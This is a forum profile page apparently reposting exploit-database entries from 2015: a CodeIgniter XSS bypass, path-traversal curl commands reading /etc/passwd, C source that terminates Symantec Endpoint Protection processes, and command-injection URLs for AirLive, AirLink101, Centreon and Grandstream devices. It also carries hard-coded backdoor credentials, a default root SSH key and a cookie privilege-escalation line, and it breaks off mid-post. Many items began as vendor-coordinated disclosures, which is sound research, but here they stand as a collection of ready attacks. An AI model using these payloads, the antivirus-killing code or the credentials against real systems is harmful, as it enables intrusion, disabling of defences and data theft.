Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    CodeIgniter 2.1 - 'xss_clean()' Filter Security Bypass

    HireHackking posted a blog entry in Hacker Technology
    source: https://www.securityfocus.com/bid/54620/info CodeIgniter is prone to a security-bypass vulnerability. An attacker can exploit this issue to bypass XSS filter protections and perform cross-site scripting attacks. CodeIgniter versions prior to 2.1.2 are vulnerable. Build an application on CodeIgniter 2.1.0: // application/controllers/xssdemo.php <?php if ( ! defined('BASEPATH')) exit('No direct script access allowed'); class Xssdemo extends CI_Controller { public function index() { $data['xss'] = $this->security->xss_clean($this->input->post('xss')); $this->load->view('xssdemo', $data); } } // application/views/xssdemo.php <form method=post> <textarea name=xss><?php echo htmlspecialchars($xss); ?>&lt;/textarea&gt; <input type=submit /> </form> <p>XSS: <hr /> <?php echo $xss ?> Launch http://app-uri/index.php/xssdemo and try above vectors.
  2. HireHackking

    Cradlepoint MBR1400 and MBR1200 - Local File Inclusion

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Cradlepoint MBR LFI # Date: 7/7/2015 # Exploit Author: Doc_Hak # Vendor Homepage: https://cradlepoint.com/ # Version: 1200/1400 (REQUIRED) # Tested on: Embedded linux I found a local file include with root level permissions on cradlepoint routers. So far looks like it works on MBR1400 and MBR1200 routers, though others could be affected. I say it is with root level because it can read /etc/passwd and there is no "x" indicating the hash is stored in the /etc/shadow file. Therefore the root hash is included in this file. To access the root hash on Cradlepoint MBRs simply: curl http://192.168.1.1/../../../../../../../../../../../../etc/passwd
  3. HireHackking

    WordPress Plugin chenpress - Arbitrary File Upload

    HireHackking posted a blog entry in Hacker Technology
    source: https://www.securityfocus.com/bid/54635/info The chenpress plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. http://www.example.com/wp-content/plugins/chenpress/FCKeditor/editor/filemanager/browser/mcpuk/browser.html
  4. HireHackking

    Symantec Endpoint Protection 12.1.4013 - Service Disabling

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Antivirus # Google Dork: intitle: Antivirus # Date: 2015-07-07 # Exploit Author: John Page ( hyp3rlinx ) # Website: hyp3rlinx.altervista.org # Vendor Homepage: www.symantec.com # Software Link: www.symantec.com/endpoint-protection # Version:12.1.4013 # Tested on: windows 7 SP1 # Category: Antivirus Vendor: ================================ Symantec ( www.symantec.com ) Product: ================================ Symantec EP 12.1.4013 Advisory Information: ================================================ Disabling Vulnerability Vulnerability Details: ===================== Symantec EP agent & services can be rendered useless even after globally locking down endpoint protection via a Symantec central management server and enabling globally managed password protection controls. Tested successfully on Windows 7 SP1 result may vary OS to OS. Exploit code(s): =============== #include <windows.h> #include <Tlhelp32.h> #define SMC_EXE "Smc.exe" #define SMC_GUI "SmcGui.exe" #define CC_SVC_HST "ccSvcHst.exe" /* By John Page (hyp3rlinx) - Dec 2014 - hyp3rlinx.altervista.org Symantec Endpoint Protection version 12.1.4013 First reported to Symantec - Jan 20, 2015 Goal: Kill Symantec EP agent & services after globally locking down endpoint protection via the Symantec central management server and enabling globally managed password protection controls. Tested successfully on Windows 7 SP1 result may vary OS to OS. Scenario: Run the from browser upon download or save to some directory and run Not the most elegant code and I don't care... */ void el_crookedio_crosso(const char *victimo){ HANDLE hSnapShot=CreateToolhelp32Snapshot(TH32CS_SNAPALL,0); PROCESSENTRY32 pEntry; pEntry.dwSize=sizeof(pEntry); BOOL hRes=Process32First(hSnapShot,&pEntry); while(hRes){ if(strcmp(pEntry.szExeFile,victimo)==0){ HANDLE hProcess=OpenProcess(PROCESS_TERMINATE,0,(DWORD)pEntry.th32ProcessID); if (hProcess!=NULL){ TerminateProcess(hProcess,9); CloseHandle(hProcess); } } hRes=Process32Next(hSnapShot,&pEntry); } CloseHandle(hSnapShot); } DWORD exeo_de_pid(char *ghostofsin){ DWORD ret=0; PROCESSENTRY32 pe32={sizeof (PROCESSENTRY32)}; HANDLE hProcSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); if (hProcSnap==INVALID_HANDLE_VALUE) return 0; if (Process32First (hProcSnap,&pe32)) do if (!strcmp(pe32.szExeFile,ghostofsin)) { ret=pe32.th32ProcessID; break; } while (Process32Next (hProcSnap,&pe32)); CloseHandle (hProcSnap); return ret; } void angelo_maliciouso(){ int AV=exeo_de_pid(SMC_EXE); char id[8]; sprintf(id, "%d ", AV); printf("%s", id); char cmd[50]="Taskkill /F /PID "; strcat(cmd, id); system(cmd); // system("Taskkill /F /IM Smc.exe"); //Access denied. system("\"C:\\Program Files (x86)\\Symantec\\Symantec Endpoint Protection\\Smc.exe\" -disable -ntp"); Sleep(1000); el_crookedio_crosso(SMC_EXE); el_crookedio_crosso(SMC_GUI); el_crookedio_crosso(CC_SVC_HST); } int main(void){ puts("/*-----------------------------------------------------------*/\n"); puts("| EXORCIST DE SYMANTEC Antivirus version 12.1.4013 |\n"); puts("| By hyp3rlinx - Jan 2015 |\n"); puts("/*------------------------------------------------------------*/\n"); SetDebugPrivileges(); angelo_maliciouso(); Sleep(1000); el_crookedio_crosso(SMC_EXE); el_crookedio_crosso(SMC_GUI); el_crookedio_crosso(CC_SVC_HST); Sleep(2000); angelo_maliciouso(); Sleep(6000); return 0; } int SetDebugPrivileges(){ DWORD err=0; TOKEN_PRIVILEGES Debug_Privileges; if(!LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&Debug_Privileges.Privileges[0].Luid))return GetLastError(); HANDLE hToken=0; if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken)){ err=GetLastError(); if(hToken)CloseHandle(hToken); return err; } Debug_Privileges.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED; Debug_Privileges.PrivilegeCount=1; if(!AdjustTokenPrivileges(hToken,FALSE,&Debug_Privileges,0,NULL,NULL)){ err=GetLastError(); if(hToken) CloseHandle(hToken); } return err; } Disclosure Timeline: ========================================================= Vendor Notification: Jan 20, 2015 July 7, 2015 : Public Disclosure Severity Level: ========================================================= High Description: ================================================================== Request Method(s): [+] Click Vulnerable Product: [+] Symantec Endpoint Protection version 12.1.4013 Vulnerable Parameter(s): [+] N/A Affected Area(s): [+] Smc.exe, SmcGui.exe & ccSvcHst.exe ====================================================================== [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. (hyp3rlinx)
  5. HireHackking

    WordPress Plugin WP E-Commerce Shop Styling 2.5 - Arbitrary File Download

    HireHackking posted a blog entry in Hacker Technology
    Title: Remote file download vulnerability in wordpress plugin wp-ecommerce-shop-styling v2.5 Author: Larry W. Cashdollar, @_larry0 Date: 2015-07-05 Download Site: https://wordpress.org/plugins/wp-ecommerce-shop-styling Vendor: https://profiles.wordpress.org/haet/ Vendor Notified: 2015-07-05, fixed in version 2.6. Vendor Contact: http://wpshopstyling.com Description: Customize your WP ecommerce store with HTML mail templates, message content, transaction results and PDF invoices with WYSIWYG editor and placeholders. Vulnerability: The code in ./wp-ecommerce-shop-styling/includes/download.php doesn't sanitize user input to prevent sensitive system files from being downloaded. 1 <?php 2 require_once("../../../../wp-admin/admin.php"); 3 4 header('Content-disposition: attachment; filename='.$_GET['filename']); 5 header('Content-type: application/pdf'); 6 readfile(HAET_INVOICE_PATH.$_GET['filename']); 7 ?> You'll have to rename the download file via mv -- -..-..-..-..-..-..-..-..-etc-passwd passwd as the filename is set to the download filename with path. CVEID: Requested TBD OSVDB: TBD Exploit Code: • $ curl http://server/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../../../../../../etc/passwd
  6. HireHackking

    AirLink101 SkyIPCam1620W - OS Command Injection

    HireHackking posted a blog entry in Hacker Technology
    1. Advisory Information Title: AirLink101 SkyIPCam1620W OS Command Injection Advisory ID: CORE-2015-0011 Advisory URL: http://www.coresecurity.com/advisories/airlink101-skyipcam1620w-os-command-injection Date published: 2015-07-08 Date of last update: 2015-07-08 Vendors contacted: AirLink101 Release mode: User release 2. Vulnerability Information Class: OS Command Injection [CWE-78], Use of Hard-coded Credentials" [CWE-798] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2015-2280 3. Vulnerability Description AirLink101 [2] SkyIPCam1620W Wireless N MPEG4 3GPP Network Camera streams supreme quality MPEG4 and MJPEG image. It supports remote surveillance on computers over the Internet or on mobile handheld devices. The SkyIPCam1620W Wireless N MPEG4 3GPP Network Camera [1] is vulnerable to an OS Command Injection Vulnerability in the snwrite.cgi binary. 4. Vulnerable Packages AirLink101 SkyIPCam1620W Wireless N MPEG4 3GPP Network Camera with firmware FW_AIC1620W_1.1.0-12_20120709_r1192.pck (Aug. 2012) Other devices based on the same firmware are probably affected too, but they were not tested. 5. Vendor Information, Solutions and Workarounds Core Security recommends applying a WAF (Web Application Firewall) rule that would filter the vulnerable request (either the CGI file or the parameters where the injection is performed) in order to avoid exploitation. Contact the vendor for further information. 6. Credits This vulnerability was discovered and researched by Nahuel Riva from the Core Security Exploit Writing Team. The publication of this advisory was coordinated by Joaquin Rodriguez Varela from the Core Security Advisories Team. 7. Technical Description / Proof of Concept Code 7.1. OS Command Injection in CGI binary file [CVE-2015-2280] The snwrite.cgi binary has an OS Command Injection at function loc_8928 when handling the "mac" parameter: .text:00008928 .text:00008928 loc_8928 .text:00008928 BL memset .text:0000892C LDR R3, [R7,#0x40] .text:00008930 LDR R2, =stderr .text:00008934 ADD R3, R5, R3 .text:00008938 LDR R0, [R2] ; stream .text:0000893C LDR R1, =aMacS ; "mac = %s" .text:00008940 LDR R2, [R3,#0x104] .text:00008944 BL fprintf .text:00008948 LDR R2, [R7,#0x40] .text:0000894C ADD R2, R5, R2 .text:00008950 LDR R3, [R2,#0x104] .text:00008954 MOV R1, #0x80 ; maxlen .text:00008958 LDR R2, =aEtcInit_dMacwr ; "/etc/init.d/macwrite.sh %s 1>/dev/null "... .text:0000895C MOV R0, R8 ; s .text:00008960 BL snprintf .text:00008964 MOV R0, R8 ; command .text:00008968 BL system .text:0000896C LDR R4, [R7,#0x40] .text:00008970 B loc_8908 .text:00008970 ; End of function sub_88A8 .text:00008970 The "mac" parameter is used in a printf() call to build a command to execute the macwrite.sh shell script to update the MAC Address configuration. The printf() built string is then used in a system() call. Therefore, it is possible to inject arbitrary commands just by putting a ";" after the "mac" parameter, for example: http://<Camera_IP>/maker/snwrite.cgi?mac=1234;ps In order to invoke the snwrite.cgi binary valid credentials are required, but a backdoor account located in /server/usr.ini can be used: nriva@fastix:/mnt/firmware/server$ cat usr.ini admin=Basic YWRtaW46YWRtaW4= maker=Basic cHJvZHVjdG1ha2VyOmZ0dnNiYW5uZWRjb2Rl These accounts are encoded in base64 so it is relatively easy to recover them: >>> "YWRtaW46YWRtaW4=".decode("base64") 'admin:admin' >>> "cHJvZHVjdG1ha2VyOmZ0dnNiYW5uZWRjb2Rl".decode("base64") 'productmaker:ftvsbannedcode' Using the 'productmaker:ftvsbannedcode' backdoor account allows access to the path /maker/snwrite.cgi and therefore the ability to perform the injection explained above. 8. Report Timeline 2015-05-04: Core Security sent an initial email notification to AirLink101. Publication date set to June 8, 2015. 2015-05-07: Core Security sent another email notification to AirLink101. 2015-05-14: Core Security attempted to contact AirLink101 through Twitter. 2015-05-14: Core Security sent yet another email notification to AirLink101. 2015-05-14: AirLink101 replied with a direct Twitter message asking Core to resend the email. 2015-05-14: Core Security informed AirLink101 through Twitter that they resent the email. 2015-05-15: Core Security asked AirLink101 through Twitter if they were able to find the email they sent. 2015-05-18: Core Security again asked AirLink101 through Twitter if they received the email. 2015-05-19: AirLink101 replied to Core on Twitter saying that they received the email and were reviewing the situation. 2015-05-20: Core Security replied AirLink101 with a direct Twitter message stating that they needed their reply soon in order to coordinate the advisory publication. 2015-05-21: AirLink101 wrote an email requesting that Core share the model and the issue they found, and requesting a contact phone number. 2015-05-22: Core Security replied to AirLink101 by email and asked if they had a PGP key or if they preferred the report to be sent in plain text. Additionally, Core informed AirLink101 that it is their policy to communicate exclusively via email in order to keep a record. 2015-05-22: AirLink101 replied by email and asked when the advisory would be published without answering the previous question (PGP or plain text) and asked again for a contact phone number. 2015-05-26: Core Security replied to AirLink101 by email clarifying that they previously requested their input on whether they would prefer to receive the information encrypted or in plain text, and explained again that it is their policy to communicate using email. 2015-05-28: Core Security asked AirLink101 by email if they received their previous message. 2015-06-04: Core Security again asked AirLink101 if they were receiving their emails. They informed Airlink101 that if they didn't receive an answer soon they would be forced to publish their findings as a user release. 2015-06-16: Core Security informed AirLink101 that if they didn't receive an answer that week they would be forced to publish their findings. 2015-06-18: Core Security informed AirLink101 that it was their last chance to answer their emails, if not the advisory was going to be published on June 23, 2015. 2015-07-08: Advisory CORE-2015-0011 published. 9. References [1] http://airlink101.com/products/aic1620w.php. [2] http://www.airlink101.com/. 10. About CoreLabs CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. About Core Security Technologies Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 12. Disclaimer The contents of this advisory are copyright (c) 2015 Core Security and (c) 2015 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 13. PGP/GPG Keys This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
  7. HireHackking

    Immunity Debugger 1.85 - Crash (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Title: Immunity Debugger - Crash # Date: 08/07/2015 # Author: Arsyntex # Vendor Homepage: http://www.immunityinc.com/products/debugger/ # Version: v1.85 # Tested on: Windows 8.1 Pro Incorrect path/file EXtEnsion parsing. -Create folder with the name: .exe.exe and put any program inside and try debug it. -Try to debug an executable with the name: test.exe.exe or lib.exe.dll The "OpenEXEfile" function does not check if the return value of strchr() is zero. ---------------------------------------------------------------------------------- loc_4B8182: mov [esp+10h+var_10], edi add edi, 4 mov [esp+10h+var_C], 20h mov [esp+10h+arg_24], eax call strchr ; return EAX= 0 mov [esp+10h+var_10], eax mov [esp+10h+arg_28], eax ; (!) call strlen ; ntdll.strlen(s) --------------------------------------------------------------------- ntdll.strlen(s) - NULL parameter --------------------------------------------------------------------- ntdll_strlen: mov ecx, [esp+4] ; [esp+4] = 0 NULL pointer test ecx, 3 ; ... jz short loc_77C77510 ; jump ... loc_77C77510: mov eax, [ecx] ; Access Violation ---------------------------------------------------------------------
  8. HireHackking

    Centreon 2.5.4 - Multiple Vulnerabilities

    HireHackking posted a blog entry in Hacker Technology
    Merethis Centreon - Unauthenticated blind SQLi and Authenticated Remote Command Execution CVEs: CVE-2015-1560, CVE-2015-1561 Vendor: Merethis - www.centreon.com Product: Centreon Version affected: 2.5.4 and prior Product description: Centreon is the choice of some of the world's largest companies and mission-critical organizations for real-time IT performance monitoring and diagnostics management. (from https://www.centreon.com/en/) Advisory introduction: Centron 2.5.4 is susceptible to multiple vulnerabilities, including unauthenticated blind SQL injection and authenticated remote system command execution. Credit: Huy-Ngoc DAU of Deloitte Conseil, France ================================ Finding 1: Unauthenticated Blind SQL injection in isUserAdmin function (CVE-2015-1560) ================================ Vulnerable function is "isUserAdmin" (defined in include/common/common-Func.php), in which unsanitized "sid" GET parameter is used in a SQL request. PoC: https://example.domain/centreon/include/common/XmlTree/GetXmlTree.php?si d=%27%2Bif(1%3C2,sleep(1),%27%27)%2B%27 https://example.domain/centreon/include/common/XmlTree/GetXmlTree.php?si d=%27%2Bif(1%3C0,sleep(1),%27%27)%2B%27 By exploiting CVE-2015-1560, an attacker can obtain among others a valid session_id, which is required to exploit CVE-2015-1561. ================================ Finding 2: Authenticated Command Execution in getStats.php (CVE-2015-1561) ================================ $command_line variable, which is passed to popen function, is constructed using unsanitized GET parameters. PoC (a valid session_id value is required): - Reading /etc/passwd by injecting command into "ns_id" parameter: http://example.domain/centreon/include/Administration/corePerformance/ge tStats.php?ns_id=|+more+/etc/passwd+%23&key=active_service_check&start=t oday&session_id=[valid session_id] - Injecting "uname ?a" into "end" parameter: http://example.domain/centreon/include/Administration/corePerformance/ge tStats.php?ns_id=1&key=active_service_check&start=today&end=|+uname+-a+% 23&session_id=[valid session_id] Combining two vulnerabilities, an unauthenticated attacker can take control of the web server. ================================ Timeline ================================ 26/01/2015 - Vulnerabilities discovered 29/01/2015 - Vendor notified 05/02/2015 - Vendor fixed SQLi 13/02/2015 - Vendor fixed RCE References Vendor fixes: - SQLi : https://forge.centreon.com/projects/centreon/repository/revisions/d14f21 3b9c60de1bad0b464fd6403c828cf12582 - Command execution : https://forge.centreon.com/projects/centreon/repository/revisions/d14f21 3b9c60de1bad0b464fd6403c828cf12582 About Deloitte: Deloitte refers to one or more of Deloitte Touche Tohmatsu Limited, a UK private company limited by guarantee, and its network of member firms, each of which is a legally separate and independent entity. Please see www.deloitte.com/about for a detailed description of the legal structure of Deloitte Touche Tohmatsu Limited and its member firms. In France, Deloitte SAS is the member firm of Deloitte Touche Tohmatsu Limited, and professional services are provided by its subsidiaries and affiliates. Our Enterprise Risk Services practice is made up of over 11,000 professionals providing services relating to security, privacy & resilience; data governance and analytics; information and controls assurance; risk management technologies; and technology risk & governance. We help organizations build value by taking a "Risk Intelligent" approach to managing financial, technology, and business risks.
  9. HireHackking

    Grandstream GXV3275 < 1.0.3.30 - Multiple Vulnerabilities

    HireHackking posted a blog entry in Hacker Technology
    The Grandstream GXV3275 is an Android-based VoIP phone. Several vulnerabilities were found affecting this device. * The device ships with a default root SSH key, which could be used as a backdoor: /system/root/.ssh # cat authorized_keys Public key portion is: ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgwCIcYbgmdHTpTeDcBA4IOg5Z7d2By0GXGihZzcTxZC+YTWGUe/HJc+pYDpDrGMWg0hMqd+JPs1GaLNw4pw0Mip6VMT7VjoZ8Z+n2ULNyK1IoTU4C3Ea4vcYVR8804Pvh9vXxC0iuMEr1Jx7SewUwSlABX04uVpEObgnUhpi+hn/H34/ jhzhao@jhzhao-Lenovo Fingerprint: md5 7b:6e:a0:00:19:54:a6:39:84:1f:f9:18:2e:79:61:b5 This issue has not been resolved. * The SSH interface only provides access to a limited CLI. The CLI's ping and traceroute commands will pass user input as parameters to underlying system commands without escaping shell metacharacters. This can be exploited to break out to a shell: GXV3275 > traceroute $(sh) This shell will only see stderr, so we then need to run sh with stdout redirected to stderr: sh 1>&2 This issue has been resolved in firmware version 1.0.3.30. * The web interface exposes an undocumented command execution API: http://DEVICEIP/manager?action=execcmd&command=echo%20%22hello%22%20%3E%20/system/root/test.txt This issue has been resolved in firmware version 1.0.3.30. * The web interface allows unprivileged users to escalate privileges by modifying a cookie on the client side: javascript:void(document.cookie="type=admin") Full details are available here: http://davidjorm.blogspot.com/2015/07/101-ways-to-pwn-phone.html MITRE was contacted repeatedly requesting CVE names for these issues, but never replied. David
  10. HireHackking

    AirLive (Multiple Products) - OS Command Injection

    HireHackking posted a blog entry in Hacker Technology
    1. Advisory Information Title: AirLive Multiple Products OS Command Injection Advisory ID: CORE-2015-0012 Advisory URL: http://www.coresecurity.com/advisories/airlive-multiple-products-os-command-injection Date published: 2015-07-06 Date of last update: 2015-07-06 Vendors contacted: AirLive Release mode: User release 2. Vulnerability Information Class: OS Command Injection [CWE-78], OS Command Injection [CWE-78] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2015-2279, CVE-2014-8389 3. Vulnerability Description AirLive MD-3025 [3], BU-3026 [4], BU-2015 [2], WL-2000CAM [5] and POE-200CAM [6] are IP cameras designed for professional surveillance and security applications. The built-in IR LEDs provide high quality nighttime monitoring. These AirLive [1] devices are vulnerable to an OS Command Injection Vulnerability. In the case of the MD-3025, BU-3026 and BU-2015 cameras, the vulnerability lies in the cgi_test.cgi binary file. In the case of the WL-2000CAM and POE-200CAM cameras, the command injection can be performed using the vulnerable wireless_mft.cgi binary file. 4. Vulnerable Packages AirLive BU-2015 with firmware 1.03.18 16.06.2014 AirLive BU-3026 with firmware 1.43 21.08.2014 AirLive MD-3025 with firmware 1.81 21.08.2014 AirLive WL-2000CAM with firmware LM.1.6.18 14.10.2011 AirLive POE-200CAM v2 with firmware LM.1.6.17.01 Other devices may be affected too, but they were not checked. 5. Vendor Information, Solutions and Workarounds Core Security recommends to apply a WAF (Web Application Firewall) rule that would filter the vulnerable request (either the CGI file or the parameters where the injection is performed) in order to avoid exploitation. Contact the vendor for further information. 6. Credits These vulnerabilities were discovered and researched by Nahuel Riva from Core Security Exploit Writing Team. The publication of this advisory was coordinated by Joaquin Rodriguez Varela from Core Security Advisories Team. 7. Technical Description / Proof of Concept Code 7.1. OS Command Injection in cgi_test.cgi when handling certain parameters [CVE-2015-2279] There is an OS Command Injection in the cgi_test.cgi binary file in the AirLive MD-3025, BU-3026 and BU-2015 cameras when handling certain parameters. That specific CGI file can be requested without authentication, unless the user specified in the configuration of the camera that every communication should be performed over HTTPS (not enabled by default). The vulnerable parameters are the following: write_mac write_pid write_msn write_tan write_hdv These parameters are used to invoke another binary file called "info_writer". In the sub_93F4 function it uses the "QUERY_STRING" and checks if it contains any of the parameters followed by an ampersand symbol: sub_93F4 STMFD SP!, {R4-R7,LR} LDR R0, =aQuery_string ; "QUERY_STRING" SUB SP, SP, #4 BL getenv MOV R1, #0 ; c MOV R2, #0x12 ; n MOV R6, R0 LDR R0, =unk_14B70 ; s BL memset LDR R0, =aContentTypeTex ; "Content-type: text/html\n\n<body>" BL printf MOV R5, #0 LDR R7, =off_B7D0 MOV R4, R5 B loc_943C [...] loc_9540 ; jumptable 00009470 case 7 MOV R0, R6 LDR R1, =aWrite_pid ; "write_pid&" BL strstr CMP R0, #0 BEQ loc_94CC ; jumptable 00009470 default case [...] It then uses whatever appears after the ampersand symbol in a call to printf() in order to put together the parameter with which the "info_writer" binary will be invoked. Finally, it calls the system() function: [...] .text:00009730 loc_9730 ; CODE XREF: .text:00009714j .text:00009730 MOV R2, R5 .text:00009734 LDR R1, =aOptIpncInfo__1 ; "/opt/ipnc/info_writer -p %s > /dev/null" .text:00009738 MOV R0, SP .text:0000973C BL sprintf .text:00009740 MOV R0, SP .text:00009744 BL system .text:00009748 MOV R2, R5 .text:0000974C LDR R1, =aWrite_pidOkPid ; "WRITE_PID OK, PID=%s\r\n" .text:00009750 LDR R0, =unk_1977C .text:00009754 MOV R4, SP .text:00009758 BL sprintf .text:0000975C B loc_9728 [...] Consequently, if a semicolon (;) is used after the ampersand symbol, arbitrary commands can be injected into the operating system. It's important to take into account that depending on the parameter used, there are checks like this (corresponding to the write_pid parameter): .text:00009708 MOV R0, R5 .text:0000970C BL strlen .text:00009710 CMP R0, #9 This verifies that the parameter has a specific length. Because of this, the injection is somewhat limited. Nevertheless, there are possible commands that can be executed, for example: Proof of Concept: http://<Camera-IP>:8080/cgi_test.cgi?write_tan&;ls&ls%20-la PoC Output: Write MAC address, model name, hw version, sn, tan, pid,firmware version -c => set system MAC address -m [MAC] => write MAC address -n [Model Name] => write Model Name -h [HW Version] => write HW Version -v [Firmware Version] => write Firmware Version -s [SN] => write SN -t [TAN] => write TAN -d [PID] => write PID -r [CR] => write Country Region -p => show current info. Content-type: text/html <body>WRITE_TAN OK, PID=;ls&ls%20- </body></html>3g.htm 485.htm SStreamVideo.cab ado.htm cfgupgrade.cgi cgi_test.cgi client.htm default.htm default_else.htm default_ie.htm default_m.htm default_nets.htm [...] 7.2. OS Command Injection in AirLive WL-2000CAM's wireless_mft.cgi binary file [CVE-2014-8389] The AirLive WL-2000CAM anf POE-200CAM "/cgi-bin/mft/wireless_mft.cgi" binary file, has an OS command injection in the parameter ap that can be exploited using the hard-coded credentials the embedded Boa web server has inside its configuration file: username: manufacture password: erutcafunam The following proof of concept copies the file where the user credentials are stored in the web server root directory: <a href="http://<Camera-IP>/cgi-bin/mft/wireless_mft?ap=testname;cp%20/var/www/secret.passwd%20/web/html/credentials">http://<Camera-IP>/cgi-bin/mft/wireless_mft?ap=testname;cp%20/var/www/...</a> Afterwards, the user credentials can be obtained by requesting: <a href="http://<Camera-IP>/credentials">http://<Camera-IP>/credentials</a> The credentials are encoded in a string using Base64, therefore it is easy to decode them and have complete access to the device. 8. Report Timeline 2015-05-04: Core Security sent an initial email notification to AirLive. Publication date set to Jun 8, 2015. 2015-05-07: Core Security sent another email notification to AirLive. 2015-05-14: Core Security attempted to contact AirLive through Twitter. 2015-05-20: Core Security attempted to contact AirLive through Twitter again. 2015-06-16: Core Security sent another email and Twitter notification to AirLive. 2015-06-18: Core Security sent an email to Airlive explaining that this was their last opportunity to reply, if not the advisory was going to be published on June 23, 2015. 2015-07-06: Advisory CORE-2015-0012 published. 9. References [1] http://www.airlive.com. [2] http://www.airlive.com/product/BU-2015. [3] http://www.airlive.com/product/MD-3025. [4] http://www.airlive.com/product/BU-3026. [5] http://www.airlivecam.eu/manualy/ip_kamery/WL-2000CAM.pdf. [6] http://www.airlivesecurity.com/product.php?id=5#. 10. About CoreLabs CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. About Core Security Technologies Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 12. Disclaimer The contents of this advisory are copyright (c) 2015 Core Security and (c) 2015 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 13. PGP/GPG Keys This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
  11. HireHackking

    WordPress Plugin Easy2Map 1.24 - SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    Title: SQL Injection in easy2map wordpress plugin v1.24 Author: Larry W. Cashdollar, @_larry0 Date: 2015-06-08 Download Site: https://wordpress.org/plugins/easy2map Vendor: Steven Ellis Vendor Notified: 2015-06-08, fixed in v1.25 Vendor Contact: https://profiles.wordpress.org/stevenellis/ Advisory: http://www.vapid.dhs.org/advisory.php?v=131 Description: The easiest tool available for creating custom & great-looking Google Maps. Add multiple pins and customize maps with drag-and-drop simplicity. Vulnerability: The following lines in Function.php use sprintf() to format queries being sent to the database, this doesn't provide proper sanitization of user input or properly parameterize the query to the database. 90 $wpdb->query(sprintf("UPDATE $mapsTable 91 SET PolyLines = '%s' 92 WHERE ID = '%s';", $PolyLines, $mapID)); . . . 163 $wpdb->query(sprintf(" 164 UPDATE $mapsTable 165 SET TemplateID = '%s', 166 MapName = '%s', 167 Settings = '%s', 168 LastInvoked = CURRENT_TIMESTAMP, 169 CSSValues = '%s', 170 CSSValuesList = '%s', 171 CSSValuesHeading = '%s', 172 MapHTML = '%s', 173 IsActive = 1, 174 ThemeID = '%s' 175 WHERE ID = %s;", 176 $Items['mapTemplateName'], 177 $Items['mapName'], 178 urldecode($Items['mapSettingsXML']), 179 urldecode($Items["mapCSSXML"]), 180 urldecode($Items["listCSSXML"]), 181 urldecode($Items["headingCSSXML"]), 182 urldecode($Items["mapHTML"]), 183 $Items['mapThemeName'], 184 $mapID)); 185 } else { 186 187 //this is a map insert 188 if (!$wpdb->query(sprintf(" 189 INSERT INTO $mapsTable( 190 TemplateID, 191 MapName, 192 DefaultPinImage, 193 Settings, 194 LastInvoked, 195 PolyLines, 196 CSSValues, 197 CSSValuesList, 198 CSSValuesHeading, 199 MapHTML, 200 IsActive, 201 ThemeID 202 ) VALUES ('%s', '%s', '%s', '%s', 203 CURRENT_TIMESTAMP, '%s', '%s', '%s', '%s', '%s', 0, '%s');", 204 $Items['mapTemplateName'], 205 $Items['mapName'], str_replace('index.php', '', easy2map_get_plugin_url('/index.php')) . "images/map_pins/pins/111.png", 206 urldecode($Items['mapSettingsXML']), '', 207 urldecode($Items["mapCSSXML"]), 208 urldecode($Items["listCSSXML"]), 209 urldecode($Items["headingCSSXML"]), 210 urldecode($Items["mapHTML"]), 211 $Items['mapThemeName']))) . . 267 $wpdb->query(sprintf(" 268 UPDATE $mapsTable 269 SET MapName = '%s', 270 LastInvoked = CURRENT_TIMESTAMP, 271 IsActive = 1 272 WHERE ID = %s;", $mapName, $mapID)); In MapPinImageSave.php, code isn’t 